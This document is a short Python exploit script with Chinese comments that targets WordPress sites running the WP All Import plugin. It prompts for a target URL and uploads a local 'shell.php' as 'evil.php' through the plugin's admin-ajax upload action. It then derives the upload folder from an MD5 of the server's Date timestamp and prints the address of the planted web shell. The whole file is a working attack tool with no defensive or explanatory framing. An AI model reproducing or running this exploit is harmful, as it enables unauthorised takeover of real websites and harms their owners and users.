#/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests
import hashlib
from email.utils import parsedate_to_datetime

# 从用户输入获取目标 URL
target_url = input("请输入目标URL (如 http://xxx.com 或 https://xxx.com): ").strip()

# 移除末尾的斜杠
if target_url.endswith('/'):
    target_url = target_url[:-1]

file_to_upload = 'shell.php'

# 上传文件
upload_url = target_url + '/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php'
print(f"正在上传到: {upload_url}")

up_req = requests.post(upload_url, data=open(file_to_upload, 'rb').read())

# 解析 HTTP Date 头并转换为时间戳
date_str = up_req.headers.get('date', '')
timestamp = int(parsedate_to_datetime(date_str).timestamp())

# 计算 MD5
up_dir = hashlib.md5(str(timestamp).encode()).hexdigest()

shell_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + up_dir + "/evil.php"
print(f"\nShell 地址: {shell_url}")